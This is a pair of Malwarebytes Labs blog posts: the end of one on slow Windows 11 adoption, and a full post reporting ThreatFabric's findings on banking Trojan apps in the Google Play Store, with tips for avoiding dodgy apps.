If we’re lucky, the TPM hardware issues won’t be as big a concern. Some orgs may even have figured out how to update that in-house app from XP to 11 (they will not). And hey, you can always pay for patches on End of Life operating systems, should you really want to.

It seems, on balance, that it’s better to have the rollout happen slowly. Network admins have enough security concerns to worry about. Do they really need to hurl the shiny new Windows 11 into the network and juggle that responsibility too? The numbers seem to suggest not, and it’s possible Microsoft is also happy with this approach.

Whatever your decision, we wish you well in the upgrade struggles to come.

The post Most people aren’t upgrading to Windows 11: Not the end of the world appeared first on Malwarebytes Labs.

Have you downloaded that Android malware from the Play Store lately?

Security researchers have discovered banking Trojan apps on the Google Play Store, and say they have been downloaded by more than 300,000 Android users.

As you may know, banking Trojans are kitted for stealing banking data like your username and password, and two-factor authentication (2FA) codes that you use to login to your bank account. They also capable of stealing phone keystrokes, and taking screenshots of what you’re seeing on your phone as you use it. All these are done without the victim’s consent and without them noticing anything until it’s too late.

The particular malicious apps the ThreatFabric researchers found were disguised to look like apps that an Android user might normally search for, such as QR scanners, PDF scanners, cryptocurrency wallets, and fitness monitors. Knowing that a portion of Android users are aware that the Play Store often gets malware—thus are quite wary about what they download—these apps actually come with the functions they advertised, further alleviating any doubts in users minds about their legitimacy.

But, as users will soon realize, looking and acting (or sounding) like something they are expected to look and act like are only limited to ducks, as these apps begin to show their true intent after they have been installed.

So, how do these benign apps become fully malicious? The cybercriminals behind them introduce malicious code as updates to the apps—slowly and surely. It’s a common evasion tactic which gets their malicious app into the Play Store without raising alarms at the door. Note, however, that these apps can only be manually updated to have the Trojan code should the attackers desire it.

So, the human element is now introduced in an Android attack chain. Obviously, the attackers have adapted this method from the ransomware playbook.

If ransomware attackers can handpick their targets and rummage through files within their compromised networks, these Android attackers can handpick devices “infected” with their apps and manually start the download of the Trojan code in a specific region of the world. To illustrate, let’s say “Fitness App Alpha” is installed in one device in California, USA and one in Montreal, Canada. Bad Guy flicks the switch to have Trojan code downloaded into “Fitness App Alpha” in California. This means that “Fitness App Alpha” in California is now Trojanized, while the one in Montreal is not.

threatfabric victim filtering
Code sample taken from the app where attackers can target Android users who are customers of certain financial institutions they are after. This method is used by actors behind the Anatsa campaign. (Source: ThreatFabric)
threadfabric device filtering
Attackers cannot only pick their victims based on their region. They can also target Android users based on the device they use—a method used by those behind the Alien campaign. (Source: ThreatFabric)

According to ThreatFabric, filtering “makes automated detection a much harder strategy to adopt by any organization.”

Not only that, incrementally updating the app, location checking, and device checking are also methods that attackers use to ensure their app is running on actual Android devices and not on a security researcher’s testing environment.

“This incredible attention dedicated to evading unwanted attention renders automated malware detection less reliable,” the researchers further stated in their blog post. “Actors behind it took care of making their apps look legitimate and useful. There are large numbers of positive reviews for the apps. The number of installations and presence of reviews may convince Android users to install the app.”

In four months, four Android malware families have spread across the Google Play Store. They are Anatsa, Alien, Hydra, and Ermac. Their campaigns have fooled thousands of Android users, and we can only imagine how much they have already stolen from them until they were discovered and reported.

How to keep dodgy apps out of your phone

When looking for apps, make time to do your research. If you’re after, say, QR codes, searching for “the top QR codes” or “the best QR codes” may be a good start as there are dozens of articles on the internet about this very subject. If you trust the publisher of these articles, you can be assured that they have looked into these apps and tested these themselves before giving their recommendations.

Another way is to head straight to the Play Store and look for apps (a) with good reviews, (b) a large user base, and (c) that have been in the Play Store for quite some time now (at least 12 months). Be wary, of course, of reviews that could be fake. But if the app you want ticks most or all of the boxes I mentioned above, dig a little bit more deeper and find out what its problems are and why some users don’t like it.

You could also consider installing security software on your phone. We’d be remiss here if we didn’t mention that Malwarebytes has an Android product.

Lastly, now is probably a good time to also audit your apps and get rid of those that you no longer use or update. You’re safer this way, too.

The post Have you downloaded that Android malware from the Play Store lately? appeared first on Malwarebytes Labs.